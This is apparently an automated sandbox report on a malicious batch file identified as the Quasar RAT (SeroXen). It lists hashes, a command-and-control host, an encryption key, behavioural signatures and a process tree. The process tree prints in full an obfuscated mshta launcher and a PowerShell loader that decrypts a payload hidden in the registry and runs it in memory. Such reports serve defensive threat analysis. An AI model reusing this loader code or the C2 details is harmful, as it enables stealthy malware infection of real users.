Analysis

  • max time kernel
    1200s
  • max time network
    1197s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-05-2024 16:14

General

  • Target

    Uni.bat

  • Size

    12.6MB

  • MD5

    898f49c739026123b6a3811fa31abe70

  • SHA1

    31ff6036b40d70d21cb1c4c0163cba0d4c720551

  • SHA256

    78b0a14a882dec287c0dc5a294ad02a4a5aaa0d130839d49f282c7d61069471f

  • SHA512

    a9aa2bf15db84361f315156ee6386cac49c14c2449a72e2f50b2e0b8d100781019c246c03a38a37d5dfc71a7c1c5451457faba074d1a875cab615ecb8d3e453d

  • SSDEEP

    49152:sW7ldCjqzV0qZpSjVbHDGYxqXTQPJee/X5nerh1gnfFijx6ygGSPlPNEIKlfuK1u:i

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v2.2.5 | SeroXen

C2

kimsoylak.ddns.net:4782

Mutex

2cc9d61f-950d-4f23-b7d5-45d9dda2f256

Attributes
  • encryption_key

    F467D794B2E1081B6AD1EAD5813AFA74F053248D

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    1

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 14 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Drops file in System32 directory 16 IoCs
  • Suspicious use of SetThreadContext 18 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 11 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 17 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:388
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{ca3a9a41-0309-4e02-8f88-7cebbcb2684f}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5008
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{9af627d4-a629-4c6f-b9de-75ad541b56fe}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:468
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{e8e51a62-8a57-41ff-927c-51d1d7538087}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4432
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{18ff47f7-258b-45b7-86f4-c6771af7a87d}
          2⤵
            PID:5164
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{e2109bd5-f3d9-4fed-9cd0-1e5cac21961c}
            2⤵
              PID:5616
            • C:\Windows\System32\dllhost.exe
              C:\Windows\System32\dllhost.exe /Processid:{b7089098-e22a-4bba-bd55-9114c16dac2c}
              2⤵
                PID:2884
              • C:\Windows\System32\dllhost.exe
                C:\Windows\System32\dllhost.exe /Processid:{a573ada8-d071-4069-9e92-a945be30d53d}
                2⤵
                  PID:4452
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 4452 -s 308
                    3⤵
                    • Checks processor information in registry
                    • Enumerates system info in registry
                    PID:2036
                • C:\Windows\System32\dllhost.exe
                  C:\Windows\System32\dllhost.exe /Processid:{36cefa1c-9902-4f6f-9533-ce9b5bfb964b}
                  2⤵
                    PID:1976
                    • C:\Windows\system32\WerFault.exe
                      C:\Windows\system32\WerFault.exe -u -p 1976 -s 312
                      3⤵
                        PID:4048
                    • C:\Windows\System32\dllhost.exe
                      C:\Windows\System32\dllhost.exe /Processid:{f7f2e5fc-8664-4ec3-a9b5-85179541a082}
                      2⤵
                        PID:4148
                    • C:\Windows\system32\lsass.exe
                      C:\Windows\system32\lsass.exe
                      1⤵
                        PID:672
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                        1⤵
                          PID:960
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                          1⤵
                            PID:412
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                            1⤵
                              PID:1036
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                              1⤵
                                PID:1120
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                1⤵
                                  PID:1128
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                  1⤵
                                  • Drops file in System32 directory
                                  PID:1160
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                  1⤵
                                  • Drops file in System32 directory
                                  PID:1168
                                  • C:\Windows\system32\taskhostw.exe
                                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                    2⤵
                                      PID:3228
                                    • C:\Windows\$sxr-mshta.exe
                                      C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                                      2⤵
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      • Modifies registry class
                                      • Suspicious use of WriteProcessMemory
                                      PID:1856
                                      • C:\Windows\$sxr-cmd.exe
                                        "C:\Windows\$sxr-cmd.exe" /c %$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of WriteProcessMemory
                                        PID:4720
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          4⤵
                                            PID:3032
                                          • C:\Windows\$sxr-powershell.exe
                                            C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))
                                            4⤵
                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of SetWindowsHookEx
                                            • Suspicious use of WriteProcessMemory
                                            PID:4464
                                            • C:\Windows\SysWOW64\dllhost.exe
                                              C:\Windows\SysWOW64\dllhost.exe /Processid:{0ca6257c-34d9-4ff8-bd3d-5663ab2208cb}
                                              5⤵
                                                PID:2964
                                              • C:\Windows\SysWOW64\dllhost.exe
                                                C:\Windows\SysWOW64\dllhost.exe /Processid:{145cdbae-5e37-4ce9-8246-ac6dc5217cf8}
                                                5⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1528
                                              • C:\Windows\$sxr-powershell.exe
                                                "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4464).WaitForExit();[System.Threading.Thread]::Sleep(5000); function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))
                                                5⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3552
                                              • C:\Windows\SysWOW64\dllhost.exe
                                                C:\Windows\SysWOW64\dllhost.exe /Processid:{5c5f772f-6bcd-4c47-8c1c-662956ba9111}
                                                5⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2532
                                              • C:\Windows\SysWOW64\dllhost.exe
                                                C:\Windows\SysWOW64\dllhost.exe /Processid:{d21cef7c-2bbb-4e0b-8fb8-252e09654bc4}
                                                5⤵
                                                  PID:5592
                                                • C:\Windows\SysWOW64\dllhost.exe
                                                  C:\Windows\SysWOW64\dllhost.exe /Processid:{ade16bc6-570b-4883-9e39-14ab430b38c6}
                                                  5⤵
                                                    PID:5336
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 456
                                                      6⤵
                                                      • Drops file in Windows directory
                                                      • Program crash
                                                      • Checks processor information in registry
                                                      • Enumerates system info in registry
                                                      PID:2476
                                                  • C:\Windows\SysWOW64\dllhost.exe
                                                    C:\Windows\SysWOW64\dllhost.exe /Processid:{3af22e2a-c2dc-4b99-874b-e5ba3bc79ab1}
                                                    5⤵
                                                      PID:5736
